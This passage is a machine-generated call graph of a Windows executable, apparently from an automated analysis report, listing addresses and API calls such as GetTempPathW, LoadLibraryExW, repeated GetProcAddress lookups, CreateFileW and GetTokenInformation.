8718->8719 8720 7ff62cc79167 LocalFree LocalFree 8719->8720 8721 7ff62cc79183 8720->8721 8722 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8721->8722 8723 7ff62cc73c55 8722->8723 8723->8582 8723->8583 8725 7ff62cc7c5c9 8724->8725 8726 7ff62cc73ca7 8725->8726 8727 7ff62cc7c950 IsProcessorFeaturePresent 8725->8727 8726->8545 8728 7ff62cc7c968 8727->8728 8729 7ff62cc7c96f capture_previous_context 8727->8729 8728->8729 9318 7ff62cc7c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8729->9318 8736 7ff62cc78868 __std_exception_destroy 8732->8736 8733 7ff62cc788ea GetTempPathW GetCurrentProcessId 8735 7ff62cc78918 __std_exception_destroy 8733->8735 8734 7ff62cc7892f CreateDirectoryW 8734->8735 8737 7ff62cc78957 8734->8737 8735->8734 8743 7ff62cc788d8 __std_exception_destroy 8735->8743 8736->8733 8739 7ff62cc788cc 8736->8739 8736->8743 8740 7ff62cc72810 7 API calls 8737->8740 8737->8743 8738 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8741 7ff62cc73cbb 8738->8741 8742 7ff62cc72810 7 API calls 8739->8742 8740->8743 8741->8589 8741->8590 8742->8743 8743->8738 8745 7ff62cc76dc5 _get_daylight 8744->8745 8746 7ff62cc72910 9 API calls 8745->8746 8747 7ff62cc76de7 8745->8747 8746->8747 8747->8614 8754 7ff62cc76e0c 8748->8754 8749 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8751 7ff62cc76f41 8749->8751 8751->8618 8752 7ff62cc76f9a 8753 7ff62cc72710 9 API calls 8752->8753 8762 7ff62cc76f2f 8753->8762 8754->8752 8755 7ff62cc76f87 8754->8755 8757 7ff62cc74550 6 API calls 8754->8757 8759 7ff62cc76f74 8754->8759 8754->8762 8763 7ff62cc76f5d 8754->8763 9319 7ff62cc71840 8754->9319 9323 7ff62cc77e10 8754->9323 9330 7ff62cc71600 8754->9330 8756 7ff62cc72710 9 API calls 8755->8756 8756->8762 8757->8754 8760 7ff62cc72710 9 API calls 8759->8760 8760->8762 8762->8749 8764 7ff62cc72710 9 API calls 8763->8764 8764->8762 8766 7ff62cc77106 8765->8766 8770 7ff62cc76fc2 8765->8770 8766->8620 8767 7ff62cc770da 8769 7ff62cc770f2 8767->8769 9410 7ff62cc79050 FreeLibrary 8767->9410 8769->8620 8770->8767 9409 7ff62cc79050 FreeLibrary 8770->9409 8775 7ff62cc7367e 8773->8775 8774 7ff62cc7368f 8774->8609 8775->8774 9411 7ff62cc79050 FreeLibrary 8775->9411 8778 7ff62cc736bc GetModuleFileNameW 8777->8778 8778->8635 8778->8636 8780 7ff62cc79342 8779->8780 8781 7ff62cc7932f FindClose 8779->8781 8782 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8780->8782 8781->8780 8783 7ff62cc79363 8782->8783 8783->8639 8785 7ff62cc72834 8784->8785 8786 7ff62cc728d0 MessageBoxW 8785->8786 8787 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8786->8787 8788 7ff62cc72900 8787->8788 8788->8637 8790 7ff62cc80774 8789->8790 8804 7ff62cc804d4 8790->8804 8792 7ff62cc8078d 8792->8655 8853 7ff62cc8042c 8793->8853 8795 7ff62cc71a20 8795->8662 8795->8663 8797 7ff62cc7c8c0 8796->8797 8798 7ff62cc72930 GetCurrentProcessId 8797->8798 8799 7ff62cc72979 8798->8799 8949 7ff62cc72620 8799->8949 8802 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8803 7ff62cc72a31 8802->8803 8803->8679 8805 7ff62cc8053e 8804->8805 8806 7ff62cc804fe 8804->8806 8805->8806 8808 7ff62cc8054a 8805->8808 8815 7ff62cc8a884 8806->8815 8811 7ff62cc80658 8808->8811 8810 7ff62cc80525 8810->8792 8812 7ff62cc8069d 8811->8812 8814 7ff62cc80688 8811->8814 8823 7ff62cc80570 8812->8823 8814->8810 8841 7ff62cc8a5cc 8815->8841 8818 7ff62cc8a8bf 8818->8810 8820 7ff62cc8a90b 8820->8818 8849 7ff62cc8a7e8 8820->8849 8822 7ff62cc8a969 8822->8810 8824 7ff62cc805f3 8823->8824 8825 7ff62cc8058a 8823->8825 8824->8814 8825->8824 8827 7ff62cc8c2f4 8825->8827 8828 7ff62cc8c324 8827->8828 8831 7ff62cc8c1a4 8828->8831 8830 7ff62cc8c33d 8830->8824 8837 7ff62cc8878c 8831->8837 8833 7ff62cc8c1cb 8834 7ff62cc8c1d1 _fread_nolock 8833->8834 8835 7ff62cc8c1e2 SetFilePointerEx 8833->8835 8834->8830 8835->8834 8836 7ff62cc8c1fa GetLastError 8835->8836 8836->8834 8838 7ff62cc88795 _fread_nolock _get_daylight 8837->8838 8839 7ff62cc887aa _fread_nolock _get_daylight 8837->8839 8838->8833 8839->8838 8840 7ff62cc887ed _invalid_parameter_noinfo 8839->8840 8840->8838 8842 7ff62cc8a623 8841->8842 8843 7ff62cc8a5e8 GetLastError 8841->8843 8842->8818 8846 7ff62cc8a638 8842->8846 8844 7ff62cc8a5f8 8843->8844 8845 7ff62cc8a613 SetLastError 8844->8845 8845->8842 8847 7ff62cc8a654 GetLastError SetLastError 8846->8847 8848 7ff62cc8a66c 8846->8848 8847->8848 8848->8820 8850 7ff62cc8a813 8849->8850 8851 7ff62cc8a884 4 API calls 8850->8851 8852 7ff62cc8a83a 8851->8852 8852->8822 8854 7ff62cc80456 8853->8854 8859 7ff62cc80485 8853->8859 8855 7ff62cc80465 _fread_nolock _get_daylight 8854->8855 8856 7ff62cc804a2 8854->8856 8854->8859 8858 7ff62cc8047a _invalid_parameter_noinfo 8855->8858 8860 7ff62cc801ac 8856->8860 8858->8859 8859->8795 8862 7ff62cc801f5 8860->8862 8866 7ff62cc801db _fread_nolock _get_daylight 8860->8866 8861 7ff62cc801f0 _invalid_parameter_noinfo 8861->8862 8862->8859 8864 7ff62cc801e5 _fread_nolock _get_daylight 8864->8861 8866->8862 8866->8864 8867 7ff62cc802e1 _invalid_parameter_noinfo 8866->8867 8868 7ff62cc8bacc 8866->8868 8899 7ff62cc8bf1c 8866->8899 8867->8866 8869 7ff62cc8baf4 _fread_nolock _get_daylight 8868->8869 8870 7ff62cc8bb0d 8868->8870 8869->8866 8870->8869 8872 7ff62cc8bb61 _fread_nolock _get_daylight 8870->8872 8873 7ff62cc8bb92 8870->8873 8871 7ff62cc8bef9 _invalid_parameter_noinfo 8871->8869 8872->8871 8874 7ff62cc8bbb9 8873->8874 8875 7ff62cc8bbf3 8873->8875 8879 7ff62cc8bbc6 _fread_nolock _get_daylight 8873->8879 8874->8879 8895 7ff62cc8bbe2 8874->8895 8907 7ff62cc8d66c 8875->8907 8877 7ff62cc8bc04 8911 7ff62cc8a9b8 8877->8911 8881 7ff62cc8bbd2 _invalid_parameter_noinfo 8879->8881 8880 7ff62cc8bc0e 8882 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8880->8882 8898 7ff62cc8bc1d _fread_nolock _get_daylight 8881->8898 8884 7ff62cc8bc15 8882->8884 8883 7ff62cc8bd8e 8885 7ff62cc8bd93 ReadFile 8883->8885 8892 7ff62cc8c2f4 _fread_nolock 3 API calls 8884->8892 8884->8898 8888 7ff62cc8bdb9 8885->8888 8889 7ff62cc8bead GetLastError 8885->8889 8886 7ff62cc8bd21 GetConsoleMode 8886->8883 8890 7ff62cc8bd35 8886->8890 8887 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8887->8869 8888->8889 8891 7ff62cc8bd82 8888->8891 8889->8898 8890->8885 8893 7ff62cc8bd3f ReadConsoleW 8890->8893 8896 7ff62cc8bdf2 8891->8896 8891->8898 8892->8895 8893->8891 8894 7ff62cc8bd63 GetLastError 8893->8894 8894->8898 8895->8883 8895->8886 8915 7ff62cc8b6e4 8896->8915 8898->8887 8900 7ff62cc8bf39 _get_daylight 8899->8900 8902 7ff62cc8bf64 8899->8902 8901 7ff62cc8bf3e _invalid_parameter_noinfo 8900->8901 8906 7ff62cc8bf49 8901->8906 8903 7ff62cc8bfa0 8902->8903 8902->8906 8930 7ff62cc939ec 8902->8930 8935 7ff62cc8b9ac 8903->8935 8906->8866 8909 7ff62cc8d6b5 _get_daylight 8907->8909 8910 7ff62cc8d67b _fread_nolock 8907->8910 8908 7ff62cc8d69e HeapAlloc 8908->8909 8908->8910 8909->8877 8910->8908 8910->8909 8912 7ff62cc8a9bd RtlFreeHeap 8911->8912 8914 7ff62cc8a9e5 Concurrency::details::SchedulerProxy::DeleteThis _get_daylight 8911->8914 8913 7ff62cc8a9d8 GetLastError 8912->8913 8912->8914 8913->8914 8914->8880 8917 7ff62cc8b72d 8915->8917 8916 7ff62cc8b79c ReadFile 8920 7ff62cc8b7bc 8916->8920 8922 7ff62cc8b797 8916->8922 8917->8916 8917->8922 8920->8922 8923 7ff62cc8c2f4 _fread_nolock 3 API calls 8920->8923 8924 7ff62cc8b853 _fread_nolock _get_daylight 8922->8924 8925 7ff62cc8b880 8922->8925 8926 7ff62cc8c2f4 _fread_nolock 3 API calls 8922->8926 8923->8922 8924->8898 8927 7ff62cc8f910 8925->8927 8926->8925 8928 7ff62cc8f919 MultiByteToWideChar 8927->8928 8944 7ff62cc8ec08 8930->8944 8932 7ff62cc93a10 8933 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8932->8933 8934 7ff62cc93a1b 8933->8934 8934->8903 8937 7ff62cc8ba06 8935->8937 8938 7ff62cc8b9d6 _fread_nolock _get_daylight 8935->8938 8936 7ff62cc8ba1f _fread_nolock _get_daylight 8940 7ff62cc8ba32 _invalid_parameter_noinfo 8936->8940 8937->8936 8939 7ff62cc8ba7b 8937->8939 8938->8906 8941 7ff62cc8bacc _fread_nolock 16 API calls 8939->8941 8942 7ff62cc8ba98 _fread_nolock _get_daylight 8939->8942 8940->8938 8941->8942 8948 7ff62cc88568 LeaveCriticalSection 8942->8948 8945 7ff62cc8ec19 _fread_nolock 8944->8945 8946 7ff62cc8ec4e HeapAlloc 8945->8946 8947 7ff62cc8ec68 _get_daylight 8945->8947 8946->8945 8946->8947 8947->8932 8950 7ff62cc7262f 8949->8950 8951 7ff62cc72683 MessageBoxA 8950->8951 8952 7ff62cc7266f MessageBoxW 8950->8952 8953 7ff62cc72690 8951->8953 8952->8953 8954 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8953->8954 8955 7ff62cc726a0 8954->8955 8955->8802 8957 7ff62cc76365 8956->8957 8958 7ff62cc763aa 8957->8958 8960 7ff62cc763cd 8957->8960 8959 7ff62cc72710 9 API calls 8958->8959 8978 7ff62cc763c3 8959->8978 8961 7ff62cc76403 8960->8961 8962 7ff62cc72710 9 API calls 8960->8962 9020 7ff62cc74550 8961->9020 8962->8961 8964 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8966 7ff62cc7336e 8964->8966 8966->8683 8979 7ff62cc764f0 8966->8979 8967 7ff62cc79070 LoadLibraryExW 8968 7ff62cc7641b 8967->8968 8969 7ff62cc76459 8968->8969 8970 7ff62cc76439 8968->8970 9024 7ff62cc79070 8969->9024 8971 7ff62cc72710 9 API calls 8970->8971 8971->8978 8973 7ff62cc76466 8974 7ff62cc76472 8973->8974 8975 7ff62cc764b1 8973->8975 8977 7ff62cc7648a GetLastError 8974->8977 9028 7ff62cc75820 GetProcAddress 8975->9028 8977->8978 8978->8964 8980 7ff62cc76516 8979->8980 8981 7ff62cc7651e 8980->8981 8982 7ff62cc7652f 8980->8982 8984 7ff62cc72710 9 API calls 8981->8984 9116 7ff62cc74c80 8982->9116 9010 7ff62cc7652a 8984->9010 8986 7ff62cc7653b 8987 7ff62cc72710 9 API calls 8986->8987 8987->9010 8988 7ff62cc7654c 8989 7ff62cc7655c 8988->8989 8991 7ff62cc7656d 8988->8991 8990 7ff62cc72710 9 API calls 8989->8990 8990->9010 8992 7ff62cc7658c 8991->8992 8993 7ff62cc7659d 8991->8993 8994 7ff62cc72710 9 API calls 8992->8994 8995 7ff62cc765ac 8993->8995 8996 7ff62cc765bd 8993->8996 8994->9010 8997 7ff62cc72710 9 API calls 8995->8997 9120 7ff62cc74d40 8996->9120 8997->9010 9000 7ff62cc765cc 9002 7ff62cc72710 9 API calls 9000->9002 9001 7ff62cc765dd 9003 7ff62cc765ec 9001->9003 9004 7ff62cc765fd 9001->9004 9002->9010 9005 7ff62cc72710 9 API calls 9003->9005 9006 7ff62cc7660f 9004->9006 9008 7ff62cc76620 9004->9008 9005->9010 9007 7ff62cc72710 9 API calls 9006->9007 9007->9010 9009 7ff62cc72710 9 API calls 9008->9009 9008->9010 9009->9010 9010->8685 9012 7ff62cc76060 9011->9012 9012->9012 9013 7ff62cc76089 9012->9013 9017 7ff62cc760a0 __std_exception_destroy 9012->9017 9014 7ff62cc72710 9 API calls 9013->9014 9015 7ff62cc76095 9014->9015 9015->8683 9018 7ff62cc72710 9 API calls 9017->9018 9019 7ff62cc761ab 9017->9019 9124 7ff62cc71470 9017->9124 9018->9017 9019->8683 9021 7ff62cc7455a 9020->9021 9022 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9021->9022 9023 7ff62cc745a7 9022->9023 9023->8967 9023->8968 9025 7ff62cc79400 9024->9025 9026 7ff62cc79084 LoadLibraryExW 9025->9026 9027 7ff62cc790a3 __std_exception_destroy 9026->9027 9027->8973 9029 7ff62cc75842 GetLastError 9028->9029 9030 7ff62cc7586f GetProcAddress 9028->9030 9033 7ff62cc7584f 9029->9033 9031 7ff62cc7589a GetProcAddress 9030->9031 9032 7ff62cc7588b GetLastError 9030->9032 9034 7ff62cc758b6 GetLastError 9031->9034 9035 7ff62cc758c5 GetProcAddress 9031->9035 9032->9033 9033->8978 9034->9033 9036 7ff62cc758f3 GetProcAddress 9035->9036 9037 7ff62cc758e1 GetLastError 9035->9037 9038 7ff62cc75921 GetProcAddress 9036->9038 9039 7ff62cc7590f GetLastError 9036->9039 9037->9033 9040 7ff62cc7593d GetLastError 9038->9040 9041 7ff62cc7594f GetProcAddress 9038->9041 9039->9033 9040->9033 9042 7ff62cc7597d GetProcAddress 9041->9042 9043 7ff62cc7596b GetLastError 9041->9043 9044 7ff62cc759ab GetProcAddress 9042->9044 9045 7ff62cc75999 GetLastError 9042->9045 9043->9042 9046 7ff62cc759d9 GetProcAddress 9044->9046 9047 7ff62cc759c7 GetLastError 9044->9047 9045->9044 9048 7ff62cc75a07 GetProcAddress 9046->9048 9049 7ff62cc759f5 GetLastError 9046->9049 9047->9046 9050 7ff62cc75a35 GetProcAddress 9048->9050 9051 7ff62cc75a23 GetLastError 9048->9051 9049->9048 9052 7ff62cc75a63 GetProcAddress 9050->9052 9053 7ff62cc75a51 GetLastError 9050->9053 9051->9050 9054 7ff62cc75a91 GetProcAddress 9052->9054 9055 7ff62cc75a7f GetLastError 9052->9055 9053->9052 9056 7ff62cc75aad GetLastError 9054->9056 9057 7ff62cc75abf GetProcAddress 9054->9057 9055->9054 9056->9057 9058 7ff62cc75aed GetProcAddress 9057->9058 9059 7ff62cc75adb GetLastError 9057->9059 9060 7ff62cc75b1b GetProcAddress 9058->9060 9061 7ff62cc75b09 GetLastError 9058->9061 9059->9058 9062 7ff62cc75b49 GetProcAddress 9060->9062 9063 7ff62cc75b37 GetLastError 9060->9063 9061->9060 9064 7ff62cc75b77 GetProcAddress 9062->9064 9065 7ff62cc75b65 GetLastError 9062->9065 9063->9062 9066 7ff62cc75ba5 GetProcAddress 9064->9066 9067 7ff62cc75b93 GetLastError 9064->9067 9065->9064 9068 7ff62cc75bd3 GetProcAddress 9066->9068 9069 7ff62cc75bc1 GetLastError 9066->9069 9067->9066 9070 7ff62cc75c01 GetProcAddress 9068->9070 9071 7ff62cc75bef GetLastError 9068->9071 9069->9068 9072 7ff62cc75c1d GetLastError 9070->9072 9073 7ff62cc75c2f GetProcAddress 9070->9073 9071->9070 9072->9073 9074 7ff62cc75c5d GetProcAddress 9073->9074 9075 7ff62cc75c4b GetLastError 9073->9075 9076 7ff62cc75c8b GetProcAddress 9074->9076 9077 7ff62cc75c79 GetLastError 9074->9077 9075->9074 9078 7ff62cc75cb9 GetProcAddress 9076->9078 9079 7ff62cc75ca7 GetLastError 9076->9079 9077->9076 9080 7ff62cc75ce7 GetProcAddress 9078->9080 9081 7ff62cc75cd5 GetLastError 9078->9081 9079->9078 9082 7ff62cc75d15 GetProcAddress 9080->9082 9083 7ff62cc75d03 GetLastError 9080->9083 9081->9080 9084 7ff62cc75d43 GetProcAddress 9082->9084 9085 7ff62cc75d31 GetLastError 9082->9085 9083->9082 9086 7ff62cc75d71 GetProcAddress 9084->9086 9087 7ff62cc75d5f GetLastError 9084->9087 9085->9084 9088 7ff62cc75d8d GetLastError 9086->9088 9089 7ff62cc75d9f GetProcAddress 9086->9089 9087->9086 9088->9089 9090 7ff62cc75dcd GetProcAddress 9089->9090 9091 7ff62cc75dbb GetLastError 9089->9091 9092 7ff62cc75dfb GetProcAddress 9090->9092 9093 7ff62cc75de9 GetLastError 9090->9093 9091->9090 9094 7ff62cc75e29 GetProcAddress 9092->9094 9095 7ff62cc75e17 GetLastError 9092->9095 9093->9092 9096 7ff62cc75e57 GetProcAddress 9094->9096 9097 7ff62cc75e45 GetLastError 9094->9097 9095->9094 9098 7ff62cc75e85 GetProcAddress 9096->9098 9099 7ff62cc75e73 GetLastError 9096->9099 9097->9096 9100 7ff62cc75eb3 GetProcAddress 9098->9100 9101 7ff62cc75ea1 GetLastError 9098->9101 9099->9098 9102 7ff62cc75ee1 GetProcAddress 9100->9102 9103 7ff62cc75ecf GetLastError 9100->9103 9101->9100 9104 7ff62cc75efd GetLastError 9102->9104 9105 7ff62cc75f0f GetProcAddress 9102->9105 9103->9102 9104->9105 9106 7ff62cc75f3d GetProcAddress 9105->9106 9107 7ff62cc75f2b GetLastError 9105->9107 9108 7ff62cc75f6b GetProcAddress 9106->9108 9109 7ff62cc75f59 GetLastError 9106->9109 9107->9106 9110 7ff62cc75f99 GetProcAddress 9108->9110 9111 7ff62cc75f87 GetLastError 9108->9111 9109->9108 9112 7ff62cc75fc7 GetProcAddress 9110->9112 9113 7ff62cc75fb5 GetLastError 9110->9113 9111->9110 9114 7ff62cc75ff5 9112->9114 9115 7ff62cc75fe3 GetLastError 9112->9115 9113->9112 9114->8978 9115->9114 9117 7ff62cc74cb0 9116->9117 9118 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9117->9118 9119 7ff62cc74d1a 9118->9119 9119->8986 9119->8988 9123 7ff62cc74d55 __std_exception_destroy 9120->9123 9121 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9122 7ff62cc74e6e 9121->9122 9122->9000 9122->9001 9123->9121 9125 7ff62cc745b0 40 API calls 9124->9125 9126 7ff62cc71493 9125->9126 9127 7ff62cc714bc 9126->9127 9128 7ff62cc7149b 9126->9128 9130 7ff62cc80744 7 API calls 9127->9130 9129 7ff62cc72710 9 API calls 9128->9129 9131 7ff62cc714ab 9129->9131 9132 7ff62cc714d1 9130->9132 9131->9017 9133 7ff62cc714f8 9132->9133 9134 7ff62cc714d5 _get_daylight 9132->9134 9136 7ff62cc71508 _get_daylight 9133->9136 9137 7ff62cc71532 9133->9137 9135 7ff62cc72910 9 API calls 9134->9135 9142 7ff62cc714f3 __std_exception_destroy 9135->9142 9140 7ff62cc72910 9 API calls 9136->9140 9138 7ff62cc71538 9137->9138 9145 7ff62cc7154b 9137->9145 9148 7ff62cc71210 9138->9148 9140->9142 9141 7ff62cc800bc 11 API calls 9144 7ff62cc715c4 9141->9144 9142->9141 9143 7ff62cc8040c _fread_nolock 23 API calls 9143->9145 9144->9017 9145->9142 9145->9143 9146 7ff62cc715d6 _get_daylight 9145->9146 9147 7ff62cc72910 9 API calls 9146->9147 9147->9142 9149 7ff62cc71268 9148->9149 9150 7ff62cc71297 9149->9150 9151 7ff62cc7126f 9149->9151 9154 7ff62cc712d4 9150->9154 9155 7ff62cc712b1 _get_daylight 9150->9155 9152 7ff62cc72710 9 API calls 9151->9152 9153 7ff62cc71282 9152->9153 9153->9142 9157 7ff62cc712e6 _get_daylight 9154->9157 9163 7ff62cc71309 _fread_nolock 9154->9163 9156 7ff62cc72910 9 API calls 9155->9156 9160 7ff62cc712cf __std_exception_destroy 9156->9160 9159 7ff62cc72910 9 API calls 9157->9159 9158 7ff62cc8040c _fread_nolock 23 API calls 9158->9163 9159->9160 9160->9142 9161 7ff62cc713cf 9162 7ff62cc72710 9 API calls 9161->9162 9162->9160 9163->9158 9163->9160 9163->9161 9165 7ff62cc85f38 9164->9165 9166 7ff62cc85f5e _get_daylight 9165->9166 9168 7ff62cc85f91 9165->9168 9167 7ff62cc85f63 _invalid_parameter_noinfo 9166->9167 9170 7ff62cc85f6e _get_daylight 9167->9170 9168->9170 9171 7ff62cc8ff3c 9168->9171 9170->8690 9172 7ff62cc8ff62 9171->9172 9174 7ff62cc8ff96 9172->9174 9175 7ff62cc96dc4 9172->9175 9174->9170 9178 7ff62cc963c4 9175->9178 9179 7ff62cc963f9 9178->9179 9180 7ff62cc963db _get_daylight 9178->9180 9179->9180 9181 7ff62cc96415 9179->9181 9182 7ff62cc963e0 _invalid_parameter_noinfo 9180->9182 9187 7ff62cc969d4 9181->9187 9184 7ff62cc963ee 9182->9184 9184->9174 9185 7ff62cc96440 9185->9184 9209 7ff62cc88568 LeaveCriticalSection 9185->9209 9210 7ff62cc96708 9187->9210 9189 7ff62cc96a1b 9198 7ff62cc96a49 _fread_nolock _get_daylight 9189->9198 9218 7ff62cc88590 9189->9218 9191 7ff62cc96a66 9192 7ff62cc96a86 CreateFileW 9191->9192 9191->9198 9193 7ff62cc96af1 9192->9193 9194 7ff62cc96b6c GetFileType 9192->9194 9196 7ff62cc96b39 GetLastError 9193->9196 9199 7ff62cc96aff CreateFileW 9193->9199 9195 7ff62cc96b79 GetLastError 9194->9195 9202 7ff62cc96bca 9194->9202 9223 7ff62cc84eec 9195->9223 9196->9198 9198->9185 9199->9194 9199->9196 9200 7ff62cc96b88 CloseHandle 9200->9198 9201 7ff62cc96bba _get_daylight 9200->9201 9201->9198 9204 7ff62cc96c40 9202->9204 9225 7ff62cc96910 9202->9225 9204->9198 9205 7ff62cc96d0c CloseHandle CreateFileW 9204->9205 9205->9201 9206 7ff62cc96d53 GetLastError 9205->9206 9207 7ff62cc96d60 _fread_nolock 9206->9207 9233 7ff62cc886d0 9207->9233 9211 7ff62cc96734 _get_daylight 9210->9211 9212 7ff62cc96752 _get_daylight 9210->9212 9211->9212 9213 7ff62cc96743 _invalid_parameter_noinfo 9211->9213 9215 7ff62cc967d0 _get_daylight 9212->9215 9217 7ff62cc967c1 _invalid_parameter_noinfo 9212->9217 9213->9212 9214 7ff62cc9681f 9214->9189 9215->9214 9216 7ff62cc96812 _invalid_parameter_noinfo 9215->9216 9216->9214 9217->9215 9219 7ff62cc885b3 9218->9219 9220 7ff62cc885dc 9219->9220 9221 7ff62cc88632 EnterCriticalSection 9219->9221 9220->9191 9221->9220 9222 7ff62cc88641 LeaveCriticalSection 9221->9222 9222->9219 9224 7ff62cc84ef9 Concurrency::details::SchedulerProxy::DeleteThis 9223->9224 9224->9200 9226 7ff62cc96947 9225->9226 9229 7ff62cc96965 _fread_nolock _get_daylight 9225->9229 9227 7ff62cc8c2f4 _fread_nolock 3 API calls 9226->9227 9226->9229 9228 7ff62cc9695c 9227->9228 9228->9229 9230 7ff62cc8bacc _fread_nolock 16 API calls 9228->9230 9229->9204 9232 7ff62cc96992 9230->9232 9231 7ff62cc8c2f4 _fread_nolock 3 API calls 9231->9229 9232->9229 9232->9231 9234 7ff62cc886ec 9233->9234 9235 7ff62cc88750 _fread_nolock _get_daylight 9233->9235 9234->9235 9236 7ff62cc88748 SetStdHandle 9234->9236 9235->9201 9236->9235 9238 7ff62cc87968 9237->9238 9241 7ff62cc87444 9238->9241 9240 7ff62cc87981 9240->8701 9242 7ff62cc8745f 9241->9242 9243 7ff62cc8748e 9241->9243 9244 7ff62cc8a884 4 API calls 9242->9244 9247 7ff62cc874b0 9243->9247 9245 7ff62cc8747f 9244->9245 9245->9240 9248 7ff62cc874cb 9247->9248 9251 7ff62cc874f4 9247->9251 9249 7ff62cc8a884 4 API calls 9248->9249 9250 7ff62cc874eb 9249->9250 9250->9245 9251->9250 9252 7ff62cc87576 9251->9252 9255 7ff62cc8775c 9252->9255 9256 7ff62cc87776 9255->9256 9258 7ff62cc8780d ReadFile 9256->9258 9260 7ff62cc877a3 9256->9260 9257 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9259 7ff62cc87584 9257->9259 9258->9260 9259->9250 9260->9257 9262 7ff62cc7feb3 9261->9262 9265 7ff62cc7fee1 9261->9265 9263 7ff62cc8a884 4 API calls 9262->9263 9264 7ff62cc7fed3 9263->9264 9264->8705 9265->9264 9267 7ff62cc7ff14 9265->9267 9268 7ff62cc7ff2f 9267->9268 9271 7ff62cc7ff54 9267->9271 9269 7ff62cc8a884 4 API calls 9268->9269 9270 7ff62cc7ff4f 9269->9270 9270->9264 9271->9270 9277 7ff62cc8adf8 9271->9277 9273 7ff62cc7ff71 9281 7ff62cc8aa6c 9273->9281 9276 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9276->9270 9278 7ff62cc8ae20 9277->9278 9279 7ff62cc8ae0c 9277->9279 9278->9273 9279->9278 9280 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9279->9280 9280->9278 9282 7ff62cc8aa98 9281->9282 9287 7ff62cc7ff83 9281->9287 9283 7ff62cc8aafc 9282->9283 9285 7ff62cc8aac8 9282->9285 9284 7ff62cc8a884 4 API calls 9283->9284 9284->9287 9288 7ff62cc8a9f4 9285->9288 9287->9270 9287->9276 9289 7ff62cc8aa10 9288->9289 9290 7ff62cc8aa45 9289->9290 9294 7ff62cc8abc8 9289->9294 9307 7ff62cc88568 LeaveCriticalSection 9290->9307 9295 7ff62cc8878c _fread_nolock _invalid_parameter_noinfo 9294->9295 9297 7ff62cc8abe4 9295->9297 9296 7ff62cc8abea 9299 7ff62cc886d0 SetStdHandle 9296->9299 9297->9296 9298 7ff62cc8ac27 9297->9298 9300 7ff62cc8878c _fread_nolock _invalid_parameter_noinfo 9297->9300 9298->9296 9301 7ff62cc8878c _fread_nolock _invalid_parameter_noinfo 9298->9301 9306 7ff62cc8ac4f _fread_nolock 9299->9306 9302 7ff62cc8ac1a 9300->9302 9303 7ff62cc8ac33 CloseHandle 9301->9303 9304 7ff62cc8878c _fread_nolock _invalid_parameter_noinfo 9302->9304 9303->9296 9305 7ff62cc8ac40 GetLastError 9303->9305 9304->9298 9305->9296 9306->9290 9309 7ff62cc78823 __std_exception_destroy 9308->9309 9310 7ff62cc787a1 GetTokenInformation 9308->9310 9313 7ff62cc7883c 9309->9313 9314 7ff62cc78836 CloseHandle 9309->9314 9311 7ff62cc787cd 9310->9311 9312 7ff62cc787c2 GetLastError 9310->9312 9311->9309 9315 7ff62cc787e9 GetTokenInformation 9311->9315 9312->9309 9312->9311 9313->8718 9314->9313 9315->9309 9316 7ff62cc7880c 9315->9316 9316->9309 9317 7ff62cc78816 ConvertSidToStringSidW 9316->9317 9317->9309 9320 7ff62cc71865 9319->9320 9322 7ff62cc718d5 9319->9322 9320->9322 9367 7ff62cc85094 9320->9367 9322->8754 9324 7ff62cc77e1e 9323->9324 9327 7ff62cc77f42 9324->9327 9328 7ff62cc74550 6 API calls 9324->9328 9329 7ff62cc77f13 CreateDirectoryW 9324->9329 9325 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9326 7ff62cc77f73 9325->9326 9326->8754 9327->9325 9328->9324 9329->9324 9329->9327 9331 7ff62cc71637 9330->9331 9332 7ff62cc71613 9330->9332 9334 7ff62cc745b0 40 API calls 9331->9334 9374 7ff62cc71050 9332->9374 9336 7ff62cc7164b 9334->9336 9335 7ff62cc71618 9337 7ff62cc7162e 9335->9337 9341 7ff62cc72710 9 API calls 9335->9341 9338 7ff62cc71682 9336->9338 9339 7ff62cc71653 _get_daylight 9336->9339 9337->8754 9340 7ff62cc745b0 40 API calls 9338->9340 9345 7ff62cc72910 9 API calls 9339->9345 9342 7ff62cc71696 9340->9342 9341->9337 9343 7ff62cc716b8 9342->9343 9344 7ff62cc7169e 9342->9344 9347 7ff62cc80744 7 API calls 9343->9347 9346 7ff62cc72710 9 API calls 9344->9346 9348 7ff62cc71671 9345->9348 9349 7ff62cc716ae 9346->9349 9350 7ff62cc716cd 9347->9350 9348->8754 9353 7ff62cc800bc 11 API calls 9349->9353 9351 7ff62cc716f9 9350->9351 9352 7ff62cc716d1 _get_daylight 9350->9352 9354 7ff62cc71717 9351->9354 9355 7ff62cc716ff 9351->9355 9358 7ff62cc72910 9 API calls 9352->9358 9357 7ff62cc71829 9353->9357 9359 7ff62cc71739 _get_daylight 9354->9359 9364 7ff62cc71761 9354->9364 9356 7ff62cc71210 33 API calls 9355->9356 9363 7ff62cc716ef __std_exception_destroy 9356->9363 9357->8754 9358->9363 9361 7ff62cc72910 9 API calls 9359->9361 9360 7ff62cc800bc 11 API calls 9360->9349 9361->9363 9362 7ff62cc8040c _fread_nolock 23 API calls 9362->9364 9363->9360 9364->9362 9364->9363 9365 7ff62cc717c5 _get_daylight 9364->9365 9366 